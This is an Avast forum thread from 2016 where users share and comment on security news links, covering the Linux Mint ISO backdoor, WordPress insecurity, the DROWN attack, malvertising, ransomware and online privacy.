https://blog.malwarebytes.org/social-engineering/2016/02/free-youtube-downloader-pup-is-just-another-tech-support-scam/?utm_source=gplus&utm_medium=social
The Phishy Accountant: Something Doesn’t Add Up
https://blog.malwarebytes.org/phishing/2016/02/the-phishy-accountant-something-doesnt-add-up/?utm_source=gplus&utm_medium=social
-
Want to destroy an iPhone? Set the date to January 1, 1970
http://www.digitaltrends.com/mobile/bricked-iphone-january-1-1970/
hmm ... of course, you turn it back to before it was born so it does not know it exist ;D
-
Want to destroy an iPhone? Set the date to January 1, 1970
http://www.digitaltrends.com/mobile/bricked-iphone-january-1-1970/ (http://www.digitaltrends.com/mobile/bricked-iphone-january-1-1970/)
hmm ... of course, you turn it back to before it was born so it does not know it exist ;D
Unplugging the battery and reconnecting it will reset the current date and fix the phone.
-
Malwarebytes receives $50M funding
https://youtu.be/6ScDyNoxQOs
-
What would happen if you used a longer passcode on your iPhone?
What if you use a longer passcode? Here’s how long the FBI would need:
seven-digit passcodes will take up to 9.2 days, and on average 4.6 days, to crack
eight-digit passcodes will take up to three months, and on average 46 days, to crack
nine-digit passcodes will take up to 2.5 years, and on average 1.2 years, to crack
10-digit passcodes will take up to 25 years, and on average 12.6 years, to crack
11-digit passcodes will take up to 253 years, and on average 127 years, to crack
12-digit passcodes will take up to 2,536 years, and on average 1,268 years, to crack
13-digit passcodes will take up to 25,367 years, and on average 12,683 years, to crack
article quote author = Mac Slavo.
pol
Personally I can't see how they can come up with these figures. Who know how many systems/GHz of processing power they can throw at the task. I'm sure the FBI wouldn't say.
But the reason for having strong passwords shouldn't have anything to do with the FBI, but preventing minor levels of hacking by criminals.
It also doesn't differentiate on these number of digits, being all numeric or alphabetic or containing special characters and or Upper/Lower case. As a mixed case, alphanumeric passcode would be much longer or the single case alpha or numeric passcode much quicker.
Not to mention who you actually are and why they might even be interested in you.
-
Uncle Sam Loves Windows 10: US Department Of Defense To Upgrade 4 Million Computers To Microsoft's Latest OS
http://www.techtimes.com/articles/134636/20160218/uncle-sam-loves-windows-10-us-department-of-defense-to-upgrade-4-million-computers-to-microsofts-latest-os.htm
-
More and more adblocker nag screens being brought in during recent days here in the Netherlands.
Saw more and more messages pop-up that go something like the quote I give as an example.
I completely adblock solely because of security reasons and keep blocking because so far no one could convince me of the fact I will no longer be bothered by malicious ads or being exposed to adware. Now I have to look at nag screens like this for instance: Dear visitor,
We noticed you use an adblocker so you can no longer see ads on website whatsever serving ads dot com. We think this is a pity, because you will have free access to this site also because of the ads we show. Will you exclude our website by whitelisiting our website?
Well this is not completely true because they will earn from my browser history, my ID tracking, my fingerprinting, my profiling, my cookies, so a thousand other ways than just the ads I block.
Why this conserted action then against adblocking? Why not try to take away the need for adblocking, so no more blackhat SEO redirects, no more fraudulent ad clicks, no more infestive malicious ads, no more browser hijacking. When earnest, upright and secure ads could be guaranteed I would be the first to hand in my ad- and script blocker, but inside the existing malcoded jungle I would not give up one of the last resorts to defend myself that I have got left.
polonus
-
Linux Mint iso's hacked and backdoored Linux Mint 17.3 Cinnamon Edition links were uploaded : https://twitter.com/Linux_Mint/status/701222478178340864
and it goes further unto darkweb: https://twitter.com/ydklijnsma/status/701331196769394688
The hacked ISOs are hosted on 5.104.175.212 and the backdoor connects to absentvodka.com
And linux-mint was not even aware while they were being hacked twice.
The hackers allegedly abused WordPress and poor polonus and others,
here in "the virus and worms", warn about WordPress insecurity all of the time,
so all our efforts to make CMS less insecure until now are completely in vain
-WordPress insecurity continues grand time.... :( :( :(
polonus
P.S. Why they did not check :o: s https://help.ubuntu.com/community/VerifyIsoHowto.
D
-
Look here: https://forum.avast.com/index.php?topic=127517.msg1294527#msg1294527
Another example of the fact that the majority of WordPress websites and websites with jQuery libraries have outdated and retirable or left code, have insecure configurations and form a daily threat to all users that visit such sites.
Many of these websites have become infested, compromised, hacked and defaced. And nobody outside a couple of forum users like our friends Pondus, Asyn, Eddy, others and little old me give this any attention.
......And of course Avast Team that does all in it's capacity to keep us out of harm's way......
polonus
-
The implications from weak WordPress security and weak signatures for the Backdoored Linux distribution threat are now obvious.
Re: https://securelist.com/blog/incidents/73893/beware-of-backdoored-linux-mint-isos/ link article author = Stefan Ortloff
Also forum hacks seems to get more popularity as the Linux Munt Blog Forum was also hacked by the cybercriminal.
There should be more attention given to website security in general and folks that put users at risk knowingly, should be held responsible.
Now everybody just shrug their shoulders and continue as usual, often recklessly and utterly unconcerned of what happened. There is just quick money to cash and insecurity is not our main concern, when trapped we move elsewhere. Often sociopaths operate in such ways. Utterly irresponsible behavior sets them out and these characters often populate just the very regions where the decisions are being made and they are often very successful in the bliss of their total ignorance. ;D
polonus
-
(http://screencast-o-matic.com/screenshots/u/Lh/1456171425672-47587.png)
Block details
Your IP: xx.xxx.xx.xxx
URL: hxxps://sitecheck.sucuri.net/results/j10futbol.us/plugins/interoffice.php
Your Browser: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.54 Safari/537.36
Block ID: BAK024
Block reason: Access to a backdoor or suspected location was denied.
Time: Mon, 22 Feb 2016 14:59:44 -0500
Server ID: cp14007
It's a dangerous world out there......
-
Well Google Safebrowsing is getting better and better at alerting. Probably would have had notification of others as well, Bitdefender TrafficLight, as MBAM blocks links there to: -magicorganicmarket.ru and -medicalfirstmall.xyz
see: -https://urlquery.net/report.php?id=1456179224812 (I broke all the links for those that would get alerts1).
And when too much of the code (without payload) is shown inside a scan result, you'd get alerts. Avast Webshield does the same and also whenever there is a slight chance it is real malcode or not. Better safe than sorry, is the message here.
Look here why it is detected: -http://www.isithacked.com/check/http%3A%2F%2Fj10futbol.us%2Fplugins%2Finteroffice.php
There is a difference of 833 bytes between the version of the page you serve to Chrome and the version you serve to GoogleBot. This probably means some code is running on your site that's trying to hide from browsers but make Google think there's something else on the page. Link might be dangerous, and we already knew this from the blacklisting.
greets,
pol
-
Security This Week: Employers Are Paying Data Firms to Predict Your Health Risks
http://www.wired.com/2016/02/security-this-week-employers-are-paying-data-firms-to-predict-your-health-risks/
-
Major Geeks delists comodo http://www.majorgeeks.com/news/story/comodo_internet_security_removed_from_majorgeeks_downloads.html
-
Major Geeks delists comodo http://www.majorgeeks.com/news/story/comodo_internet_security_removed_from_majorgeeks_downloads.html (http://www.majorgeeks.com/news/story/comodo_internet_security_removed_from_majorgeeks_downloads.html)
Major Geeks has been a favorite download site of mine for a long time. Unlike Download.com and quite a few others, they have always remained a free
and secure place to download programs without any of the trickery we've by now have had to learn to avoid.
My view on Comodo doesn't need to be expressed. Just ask Comodo's fearless leader. :)
-
Malware for mobile devices tripled last year.
https://securelist.com/analysis/kaspersky-security-bulletin/73839/mobile-malware-evolution-2015/
-
Vulnerable shared Baidu development kit creates privacy issues and security leaks for Baidu-browser:
https://citizenlab.org/2016/02/privacy-security-issues-baidu-browser/
Again in this report we see the cooperation with "ClownFlare's halfbaked-SSL" negatively being reported: In July 2014, Baidu formed a partnership with U.S.-based Internet traffic management company CloudFlare, creating a service that leverages Baidu’s Chinese data centres with CloudFlare’s traffic management services to increase traffic speeds across China’s border. The service, called Baidu Yunjiasu (百度云加速) or “Cloud acceleration,” is primarily targeted at businesses seeking to speed up the flow of traffic across China’s inefficient, censorship-heavy network. Part 2 of our analysis below describes a feature of Baidu Browser that proxies traffic to certain websites hosted outside of China to improve performance.
More important is it to mention the vulnerable apps using Baidu Analytics SDK:
ES File Explorer File Manager [com.estrongs.android.pop]
Photo Wonder-Collage Maker [cn.jingling.motu.photowonder]
Azar-Video Chat & Call, Messenger [com.azarlive.android]
ES Task Manager (Task Killer) [com.estrongs.android.taskmanager]
???PPS [tv.pps.mobile]
Meipai [com.meitu.meipaimv]
???? [com.baidu.BaiduMap]
???? [com.baidu.searchbox]
Well File Manager [com.fihtdc.filemanager]
SingPlay: Karaoke your MP3s [com.nexstreaming.app.singplay]
Kwai, the best short video App [com.smile.gifmaker]
Mydol (STAR LOCKSCREEN) [com.wacompany.mydol]
Speedometer GPS [luo.speedometergps]
ES App Locker [com.estrongs.locker] ?????HD [com.qiyi.video.pad]
polonus
-
340 apps on Google Play make you click porn-sites. Developer cat and mouse game - rather large game app fraud campaign: http://www.welivesecurity.com/2016/02/24/google-play-porn-clicker-true-large-scale-campaign/
Google makes a good effort to take such apps off immedeately, but in this particular case, the bad guys still have the upper hand.
- Quote from the ESET article by Lukáš Štefanko.
polonus
-
Critical: Drupal core should be patched: https://www.drupal.org/SA-CORE-2016-001
Mind you 2% of websites globally runs this CMS.
polonus
-
[openssl-announce] Forthcoming OpenSSL releases
https://mta.openssl.org/pipermail/openssl-announce/2016-February/000063.html
-
WorldPay too late to mitigate weak encryption on BTA's: ???
Read: https://groups.google.com/forum/?_escaped_fragment_=topic/mozilla.dev.security.policy/RHBHXJOG8Io
Read: https://blog.mozilla.org/security/2016/02/24/payment-processors-still-using-weak-crypto/
link article author = Richard barnes.
Insecurity condoned where security matters most?
polonus
-
5 Ways Skynet Is More Real Than You Think
http://www.huffingtonpost.com/2015/06/22/skynet-real_n_7042808.html
https://youtu.be/rVlhMGQgDkY
15-20 Skynet is Coming
http://www.hughmorgan.net/2015/12/01/15-20-skynet-coming/
-
Apple Hires Developer of Edward Snowden's Favorite Encrypted Chat App Called 'Signal'
http://www.patentlyapple.com/patently-apple/2016/02/apple-hires-developer-of-edward-snowdens-favorite-encrypted-chat-app-called-signal.html
-
Hi Pondus,
They say "Maybe bot" at your avatar, not definitely one. ;D
polonus
-
Hi Pondus,
They say "Maybe bot" at your avatar, not definitely one. ;D
polonus
Mybe i will be one day?
Brain implant will connect a million neurons with superfast bandwidth
http://www.futuretimeline.net/blog/2016/01/22.htm#.VtBg4JzhDWJ
-
Los Angeles Hospital Hack Raises Concerns About Ransom Attacks
http://www.npr.org/2016/02/22/467704573/los-angeles-hospital-hack-raises-concerns-about-ransom-attacks
Study Finds People Are Dumb, Will Connect to Any Wi-Fi Network
http://gizmodo.com/study-finds-people-are-dumb-will-connect-to-any-wi-fi-1760734633
Locky Ransomware Makes Its First High-Profile Victim As It Continues to Spread
http://news.softpedia.com/news/locky-ransomware-makes-its-first-high-profile-victim-as-it-continues-to-spread-500929.shtml
How to avoid potentially unwanted programs
https://www.malwarebytes.org/articles/how-to-avoid-potentially-unwanted-programs/?utm_source=gplus&utm_medium=social
The Amazon Survey Phish: Back for Round 2
https://blog.malwarebytes.org/fraud-scam/2016/02/the-amazon-survey-phish-back-for-round-2/?utm_source=linkedin&utm_medium=social
-
Los Angeles Hospital Hack Raises Concerns About Ransom Attacks
http://www.npr.org/2016/02/22/467704573/los-angeles-hospital-hack-raises-concerns-about-ransom-attacks (http://www.npr.org/2016/02/22/467704573/los-angeles-hospital-hack-raises-concerns-about-ransom-attacks)
Snip
I'm amazed at the fact that no one seems to wonder why this hospital and all the other institutions aren't prepared for this type of disaster ?
[/size]Where are their backups ? Attacks happen, hardware fails why isn't there a comprehensive backup plan that minimizes the risk ??? [/color]
[/size]Who is more at fault ? The hacker, the hard drive that fails or, the one responsible for guarding the information ???[/color]
-
Insecurity seems to be everywhere around:
90% of SSL VPNs use insecure or outdated encryption, putting your data at risk
Read: https://www.htbridge.com/blog/90-percent-of-ssl-vpns-use-insecure-or-outdated-encryption.html
The authors of that article offer a free test here: https://www.htbridge.com/ssl/
polonus
-
This is how it should be almost perfect:
https://www.htbridge.com/ssl/?id=e620b0fe1e9d347ec2ad3cb27ebf946213eee0b320fa8cfe4e68256b30671352
-
Hi Steven Winderlich,
Seems they have that server well configured there in Tampa, FL ;)
polonus
-
More IRS data breach attacks than expected: https://www.irs.gov/uac/Newsroom/IRS-Statement-On-Get-Transcript
Full end-to-end-encryption, time to bring it in, to protect our meta-data against the bad guys.
polonus
-
More IRS data breach attacks than expected: https://www.irs.gov/uac/Newsroom/IRS-Statement-On-Get-Transcript (https://www.irs.gov/uac/Newsroom/IRS-Statement-On-Get-Transcript)
Full end-to-end-encryption, time to bring it in, to protect our meta-data against the bad guys.
polonus
Using a VPN on a full time basis seems more and more like a great idea. :)
-
Using a VPN on a full time basis seems more and more like a great idea.
+1
This is a good and sound advice.
polonus
-
Linux Mint no longer uses WordPress CMS on their website: http://blog.linuxmint.com/?p=2994
Direct access to website CMS was too much of a risk, but a lot of website owners like the easy way better than the secure way.
polonus
-
"Doctor Web": a review of virus activity in February 2016
http://news.drweb.com/show/review/?lng=en&i=9861
-
Linux Mint no longer uses WordPress CMS on their website: http://blog.linuxmint.com/?p=2994
Direct access to website CMS was too much of a risk, but a lot of website owners like the easy way better than the secure way.
polonus
Wappalyzer still lists it tho.
-
`WeirdPress` gonna be more and more insecure.
You are right Steven Winderlich, on their linuxmint blog site they still have it installed.
With a staggering 33,621 plugins downloaded a total of 749,138,518 times in the case of WordPress, the impact of exploiting security vulnerabilities could be huge
Quote by Mark Wilson, one year ago, the situation may even have grown worse now. :o
polonus
-
so much for wireless devices, here goes mousejack exploit https://www.mousejack.com/
more in-depth details https://www.bastille.net/technical-details
-
A basic implementation error will turn major browsers into a real cookie monster,
so cookies set via HTTP requests may allow a remote attacker to bypass HTTPS and reveal private session information”.
Quotes taken from this article: http://www.theregister.co.uk/2015/09/25/cookies_monster_your_security/
article author = Richard Chirgwin
The malicious cookie is under the attacker's control, but even a user who looks through their cookie list might not realise it's a fake - opening the way for the attacker to grab private information.
polonus
-
Most of those cookies are likely to be 3rd party ones I suspect.
One of the other sort of security add-ons for firefox that I use is CookieMonster, this allows a reasonable degree of configuration on what cookies are allowed - particularly 3rd party cookies.
Not to mention, I automatically disable 3rd party cookies in firefox, also when I close firefox any session cookies are removed.
-
There are several extensions for Firefox that allow cookies to be controlled. I use one with the painfully obvious name of Cookie Controller. Works, and stays out of the way most of the time. Most sites I use frequently get my default of 1st-party cookies only, treating all cookies as session (gone when closing the browser). That, plus NoScript with some tuning, keeps attacks to a dull roar but does have side effects in a few places. MS, for instance, blocks access to it's "support.microsoft.com" web site if you have cookies or javascript blocked, or even if those extensions are simply present. There are other ways in, if information is needed, so that's an annoyance at worst, but these privacy mechanisms aren't without side effects.
I've tried the Avast extension in FF. It works, but doesn't appear to know that things are already blocked by something else and wants to block again. Then, after a while, everything stops working for some major sites (I think they recognize the Avast extension and throw a fit), but it all starts working again if I drop back to just Cookie Controller and NoScript. Privacy Badger is another good one, and stays mostly out of the way, but its main features are now (with less control) incorporated into FF. Ah well ... why am I reminded of Elmer Fudd trying biocontrol of the bugs in his vegetable patch ...
-
Top 10 rdp password survey: https://community.rapid7.com/community/infosec/blog/2016/03/01/the-attackers-dictionary
polonus
-
Infecting users through malicious ads gets sneakier and sneakier....malware campaigns make these ads are hidden to infest visitors with vulnerable unpatched software on their OS. Fingerprinting code inside ads can discriminate between a real victim to infest or security researchers using a honeypot for instance. Read about it here: https://malwarebytes.app.box.com/Operation-Fingerprint
This again demonstrates that visiting to-days Internet can be best done with a decent up to date adblocker up and running.
polonus
-
Keeping your browser, OS and programs updated also goes a long way toward staying safe. :)
-
Linux Mint no longer uses WordPress CMS on their website: http://blog.linuxmint.com/?p=2994
Direct access to website CMS was too much of a risk, but a lot of website owners like the easy way better than the secure way.
polonus
Wappalyzer still lists it tho.
Linux Mint Forums Hacked: https://forums.linuxmint.com/viewtopic.php?f=143&t=217298&sid=9e27bc4310f2a05cc38871aa8de6f814 (https://forums.linuxmint.com/viewtopic.php?f=143&t=217298&sid=9e27bc4310f2a05cc38871aa8de6f814)
-
Mozilla blocks add-on that can seriously hamper browser security settings and allow malicious extension to be installed:
https://addons.mozilla.org/en-US/firefox/blocked/i1129
polonus
-
In the line of the DROWn attack insecurity discussion (on vulnerable SSL v.2/SSL v.3 in stead of TLS) e-mail server config could be the weakest link. Read: https://security.stackexchange.com/questions/116139/what-is-drown-and-why-is-it-even-possible info credits go to Thomas Pornin:
There is just one thing that seems understated: e-mail servers are broken security-wise... by default and by design.
To check use sslyze: https://github.com/nabla-c0d3/sslyze
Conclusion: At any rate, if you disable SSLv2/3 on your mail server, you are safe from DROWN.
Above quote credit goes to "sleske". :)
polonus
-
WordPress plug-in backdoored to steal your passwords!
The issue with Custom Content Type Manager was detected by Sucuri's.
Read: https://blog.sucuri.net/2016/03/when-wordpress-plugin-goes-bad.html
Check WordPress plug-ins here: https://hackertarget.com/wordpress-security-scan/
or use this extension: Scan WP when the site has been built using WordPress.
WordPress plug-ins are not insecure: http://www.itpro.co.uk/security/24163/the-wordpress-cms-isnt-insecure-you-are
link article author = Davey Winder
Developers are not trained or instructed to develop with security in mind.
Still actuality: http://www.networkworld.com/article/2224843/opensource-subnet/7-of-10-leading-wordpress-plugins-are-vulnerable.html article author = Alin Shimel.
polonus (volunteer website security analyst and website error-hunter)
P.S. Seems the questioned plug-in has been taken down or has been left. ;)
-
Direct deposits rerouted after Illinois State University data breach
http://www.scmagazine.com/illinois-state-university-data-breach-compromised-employee-payments/article/480815/
It’s 2016, so why is the world still falling for Office macro malware?
http://arstechnica.com/security/2016/03/its-2016-so-why-is-the-world-still-falling-for-office-macro-malware/
This was a pain to post. Chrome was taking forever to load. Had to resort to copy/paste Chrome to Firefox.
Somethings Chrome is best...somethings Firefox is best.
-
DROWn Attack Vulnerability gonna produce a lot of threat where you do not expect it:
https://forum.avast.com/index.php?topic=184007.msg1298072#msg1298072
Background info on this attack of the week: http://blog.cryptographyengineering.com/2016/03/attack-of-week-drown.html
link article author: Matthew Green
polonus
-
Majorgeeks.com Support Forum Pwned?
http://forums.majorgeeks.com/index.php?threads/majorgeeks-com-support-forum-pwned.297230/
I received the following in an email today regarding the issue:
http://us4.campaign-archive2.com/?u=11e02cf9dc4ef3eb0ab4606ef&id=d92fa0a408&e=6ddc9fb560
-
Microsoft Security Bulletin Summary for March 2016
https://technet.microsoft.com/en-us/library/security/ms16-mar.aspx
-
KeRanger Is Actually A Rewrite of Linux.Encoder
https://labs.bitdefender.com/2016/03/keranger-is-actually-a-rewrite-of-linux-encoder/
-
Seagate employees’ W-2 forms exposed in another payroll phish
http://arstechnica.com/security/2016/03/seagate-employees-w-2-forms-exposed-in-another-payroll-phish/
It’s 2016, so why is the world still falling for Office macro malware?
http://arstechnica.com/security/2016/03/its-2016-so-why-is-the-world-still-falling-for-office-macro-malware/
How Minecraft undermined my digital defences
http://www.bbc.com/news/technology-34474883
Want Safer Passwords? Don’t Change Them So Often
http://www.wired.com/2016/03/want-safer-passwords-dont-change-often/
-
Firm sells tablet/computers for children with vulnerable Flash Player :o
Read: http://www.mikecarthy.com/offensive-security/childrens-tablet-computer-vulnerable-flash-exploit/
So Polonus would like to know and scanned the firms server address for DROWn attcak vulnerability and DANG.
So our poor kids are additionally also threatened from the DROWn attack :o
see here: https://test.drownattack.com/?site=LeapFrog.com
polonus (volunteer website security analyst and website error.hunter)
-
Firm sells tablet/computers for children with vulnerable Flash Player :o
Read: http://www.mikecarthy.com/offensive-security/childrens-tablet-computer-vulnerable-flash-exploit/ (http://www.mikecarthy.com/offensive-security/childrens-tablet-computer-vulnerable-flash-exploit/)
So Polonus would like to know and scanned the firms server address for DROWn attcak vulnerability and DANG.
So our poor kids are additionally also threatened from the DROWn attack :o
see here: https://test.drownattack.com/?site=LeapFrog.com (https://test.drownattack.com/?site=LeapFrog.com)
polonus (volunteer website security analyst and website error.hunter)
http://www.ibtimes.co.uk/leapfrog-weak-security-kid-friendly-tablet-could-leave-children-exposed-online-snooping-1548905
-
Adobe Security Bulletin
https://helpx.adobe.com/security/products/flash-player/apsb16-08.html
-
Cloud service providers are failing when it comes to protecting their clients against the recently disclosed DROWN attack, with only 33 providers having patched their servers from a total of 653 surveyed services. : http://news.softpedia.com/news/one-week-later-drown-vulnerability-still-affects-620-of-653-cloud-services-501599.shtml
link article author - Catalin Cimpanu.
polonus
-
Cloud service providers are failing when it comes to protecting their clients against the recently disclosed DROWN attack, with only 33 providers having patched their servers from a total of 653 surveyed services. : http://news.softpedia.com/news/one-week-later-drown-vulnerability-still-affects-620-of-653-cloud-services-501599.shtml (http://news.softpedia.com/news/one-week-later-drown-vulnerability-still-affects-620-of-653-cloud-services-501599.shtml)
link article author - Catalin Cimpanu.
polonus
Not much help when they don't list the effected and patched services.
-
Hi bob3160,
This is one outside that 5.1% patched against DROWn with CloudFlare, Inc. as Netblock owner.
https://test.drownattack.com/?site=ns1.hostmonster.com
You could test here for your cloud service of choice: https://test.drownattack.com/?site=
But DROWn should be patched on all underlying servers and services that share that same certificate and are vulnerable,
that it is why that exploit is that lively dangerous. Forgotten to mitigate or patch somewhere or forgotten to disable SSLv2/3 and DANG PRESTO! :o
polonus
P.S. And do not forget to scan your cloud apps: example : https://test.drownattack.com/?site=just.cloud & https://test.drownattack.com/?site=express.vpn and a long row of other vulnerable app services.
Oh, and we have to see this exploit in a clear light as not everybody will spend 400 bucks on resources to be able to compromise to decrypt the key ;) But some parties might take an interest there.... (info credits: Eric Wingfield)
Damian
-
3 year old java bug, still there
Broken security fix in Oracle Java SE 7/8/9
http://seclists.org/fulldisclosure/2016/Mar/31
-
How can you quarrel about mouseclick-surveillance, when we all already got it?
The only discussion is on making that mouse-click surveillance even simpler and more straight-forward,
to do away with all encryption obstacles that might hinder Big Brother´s dragnet.
The rest is just made-up for discussion´s sake.
Re: https://www.eff.org/deeplinks/2016/03/next-front-new-crypto-wars-whatsapp
First it is the iPhone, now it is WhatsApp.
polonus
-
Attacker leaves “SECURITY TIPS” after invading anti-DDoS firm Staminus
https://nakedsecurity.sophos.com/2016/03/15/attacker-leaves-security-tips-after-invading-anti-ddos-firm-staminus/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29
-
I use firefox with all of the blockers in place, turn off history, run a cookie cleaner and always use startpage as my search engine. I never had an issue. Never had an issue.
-
Large Angler Malvertising Campaign Hits Top Publishers
https://blog.malwarebytes.org/malvertising-2/2016/03/large-angler-malvertising-campaign-hits-top-publishers/?utm_source=linkedin&utm_medium=social
-
Security of AV code is meshy, insecure, and not of this time,
it is like hacking like in 1999. That means we´re in peril when the next big threat comes knocking at the door!
Read: http://blog.cmpxchg8b.com/2016/03/security-software-certification.html )link article author = Tavis Ormandy.
Mondern security is not what AV has to offer us.
Anyone.
polonus
-
Oh what irony and the so-called innovating software developers that react in that link and run outsourcing for known security services themselves are vulnerable to DROWn attack: https://test.drownattack.com/?site=www.nixsolutions.com
Here the winged words of Para-Noid comes to mind: ´Never trust what you haven´t tested yourself´
polonus
-
95% of https-servers vulnerable to MitM/attacks: http://news.netcraft.com/archives/2016/03/17/95-of-https-servers-vulnerable-to-trivial-mitm-attacks.html
Problem is that most https-sites do not use hsts. You can scan for that like here: https://www.expeditedssl.com/simple-ssl-scanner/scan?target_domain=
In this (random) example it is OK: https://www.expeditedssl.com/simple-ssl-scanner/scan?target_domain=www.marmotex.com
polonus
-
Javascript in transit added to a webpage that was not being addressed via https. :o
They did not like it when the cat came out of the bag:
http://thewire.in/2015/06/09/israeli-firm-strong-arms-indian-techie-for-exposing-suspicious-code-3528/
Wifi HotSpots or a malicious ISP could mean you´re at risk.
polonus
-
Large Angler Malvertising Campaign Hits Top Publishers
https://blog.malwarebytes.org/malvertising-2/2016/03/large-angler-malvertising-campaign-hits-top-publishers/?utm_source=linkedin&utm_medium=social
More on this
http://www.neowin.net/news/crypto-ransomware-hits-major-websites-through-banner-ads-in-past-24-hours
http://blog.trendmicro.com/trendlabs-security-intelligence/malvertising-campaign-in-us-leads-to-angler-exploit-kitbedep/
-
Large Angler Malvertising Campaign Hits Top Publishers
https://blog.malwarebytes.org/malvertising-2/2016/03/large-angler-malvertising-campaign-hits-top-publishers/?utm_source=linkedin&utm_medium=social (https://blog.malwarebytes.org/malvertising-2/2016/03/large-angler-malvertising-campaign-hits-top-publishers/?utm_source=linkedin&utm_medium=social)
More on this
http://www.neowin.net/news/crypto-ransomware-hits-major-websites-through-banner-ads-in-past-24-hours (http://www.neowin.net/news/crypto-ransomware-hits-major-websites-through-banner-ads-in-past-24-hours)
http://blog.trendmicro.com/trendlabs-security-intelligence/malvertising-campaign-in-us-leads-to-angler-exploit-kitbedep/ (http://blog.trendmicro.com/trendlabs-security-intelligence/malvertising-campaign-in-us-leads-to-angler-exploit-kitbedep/)
What's out there right now that will keep us safe from this ???
-
Large Angler Malvertising Campaign Hits Top Publishers
https://blog.malwarebytes.org/malvertising-2/2016/03/large-angler-malvertising-campaign-hits-top-publishers/?utm_source=linkedin&utm_medium=social (https://blog.malwarebytes.org/malvertising-2/2016/03/large-angler-malvertising-campaign-hits-top-publishers/?utm_source=linkedin&utm_medium=social)
More on this
http://www.neowin.net/news/crypto-ransomware-hits-major-websites-through-banner-ads-in-past-24-hours (http://www.neowin.net/news/crypto-ransomware-hits-major-websites-through-banner-ads-in-past-24-hours)
http://blog.trendmicro.com/trendlabs-security-intelligence/malvertising-campaign-in-us-leads-to-angler-exploit-kitbedep/ (http://blog.trendmicro.com/trendlabs-security-intelligence/malvertising-campaign-in-us-leads-to-angler-exploit-kitbedep/)
What's out there right now that will keep us safe from this ???
Well TrendMicro say they detect it
The payload dropped
As of this writing, the exploit kit proceeds to download a BEDEP variant, which, in turn drops a malware we will detect as TROJ_AVRECON.
https://www.virustotal.com/en/file/5df4bce112f1f4019c242ea1515ca55eb76f3590d53d31ec61a7c428671b7ec1/analysis/
Angler Exploit Kit is known to exploit vulnerabilities in Adobe Flash and Microsoft Silverlight, among others.
-
have been waiting for this
Security firm discovers first iOS malware that can infect non-jailbroken iPhones w/o enterprise certificate
http://9to5mac.com/2016/03/17/acedeceiver-iphone-malware/
-
TeslaCrypt 3.0.1
http://blog.talosintel.com/2016/03/teslacrypt-301-tales-from-crypto.html
-
Samas Ransomware Uses Pen Testing Tools for Delivery
http://www.securityweek.com/samas-ransomware-uses-pen-testing-tools-delivery
-
Tavis Ormandy finds up another hole in Trend Micro AV,
probably concerning DirectPass: https://twitter.com/taviso/status/710950508094029824
polonus
-
Google Docs? Check One More Time…
https://blog.malwarebytes.org/fraud-scam/2016/03/google-docs-check-one-more-time/?utm_source=gplus&utm_medium=social
A Look Into Malvertising Attacks Targeting The UK
https://blog.malwarebytes.org/malvertising-2/2016/03/a-look-into-malvertising-attacks-targeting-the-uk/?utm_source=gplus&utm_medium=social
An iCloud scam that may be worse than ransomware
https://blog.malwarebytes.org/mac/2016/03/an-icloud-scam-that-may-be-worse-than-ransomware/?utm_source=linkedin&utm_medium=social
How to beat ransomware: Prevent, don't react
https://www.malwarebytes.org/articles/how-to-beat-ransomware-prevent-dont-react/?utm_source=gplus&utm_medium=social
FBI cautions motorists to “maintain awareness” of automobile hacks
http://arstechnica.com/tech-policy/2016/03/fbi-cautions-motorists-to-maintain-awareness-of-automobile-hacks/
TopFlix: a DNS Unlocker variant
https://blog.malwarebytes.org/online-security/2016/03/topflix-a-dns-unlocker-variant/?utm_source=gplus&utm_medium=social
-
Handing over more of your privacy(mobile phone number etc.) for alleged easy log-in security?
I think it is a bad deal, for your privacy and security wise also, the mobile platform is inherently insecure and fully transparent.
It is presented to you, but not as you might intent it. :(
Read:
https://yahoo-security.tumblr.com/post/141266516770/kill-your-password-with-yahoo-account-key
We gonna be turned more and more into security unaware zombies.
-
Adobe will track you through all of your devices via Adobe marketing cloud.
First it will come to the USA and to Canada and then it is time for Europe to experience this cross device ad-tracking system.
Read: http://www.theregister.co.uk/2016/03/22/adobe_will_track_users_across_devices_with_new_coop_project/
link article author - Tim Anderson
For Yahoo there is an opt-out, but what if some ad platforms don't honor that lifetime opt out?
Another coming attack on that little privacy that is left to you in the Mobile World:
https://iapp.org/news/a/the-privacy-pitfalls-of-cross-device-tracking/ article author - Angelique Carson
Keep your script and adblocker visors up ;)
polonus
-
My question to you all here is how can you protect a little bit of the last vestiges of any privacy you have left when this co-op adtracking comes in.
Now I use the two stage search on mobile devices - so Tap&Trust and AdblockBrowser.
But whenever I block script and ads on my laptop, my co-op Android will give me away.
The gullibility of these adtracking marketeers knows no limits.
What bright developers will come up with some counter measures here to protect us.
polonus
-
My question to you all here is how can you protect a little bit of the last vestiges of any privacy you have left when this co-op adtracking comes in.
Now I use the two stage search on mobile devices - so Tap&Trust and AdblockBrowser.
But whenever I block script and ads on my laptop, my co-op Android will give me away.
The gullibility of these adtracking marketeers knows no limits.
What bright developers will come up with some counter measures here to protect us.
polonus
@ Damien,
There is no privacy on the internet. If you want privacy, you never should have used the internet.
It's too late for all of us. :)
-
@ Damien,
There is no privacy on the internet. If you want privacy, you never should have used the internet.
It's too late for all of us. :)
[/quote]
People should fight for what they want, not give in just because it looks hopeless. :)
-
@ Damien,
There is no privacy on the internet. If you want privacy, you never should have used the internet.
It's too late for all of us. :)
People should fight for what they want, not give in just because it looks hopeless. :)
That's your right even if the hen has already been let out of the henhouse. :)
Once your information is already out there, it's virtually impossible to rake it back in.
-
Well some, like Apple here, like to massage their user opinion to seek some form of damage control, I guess with this.
See: http://arstechnica.co.uk/information-technology/2016/03/report-apple-designing-its-own-servers-to-avoid-snooping/
But when we look at the server security they score only a meagre F-status: https://securityheaders.io/?q=www.apple.com%2Fnl%2F
So why they start such a discussion as a reaction to this ongoing drama, when their server security status is under par? Read as it was a reaction of what was reported here: http://www.reuters.com/article/us-apple-encryption-cellebrite-idUSKCN0WP17J (the Israeli firm failed to react). Is this just putting up more smoke-screens?
So never trust an iPhone or any other device with some info you do not wanna share with the world publicly.
polonus
-
If you have no disc image then forget it
http://blog.trendmicro.com/trendlabs-security-intelligence/petya-crypto-ransomware-overwrites-mbr-lock-users-computers/ (http://blog.trendmicro.com/trendlabs-security-intelligence/petya-crypto-ransomware-overwrites-mbr-lock-users-computers/)
-
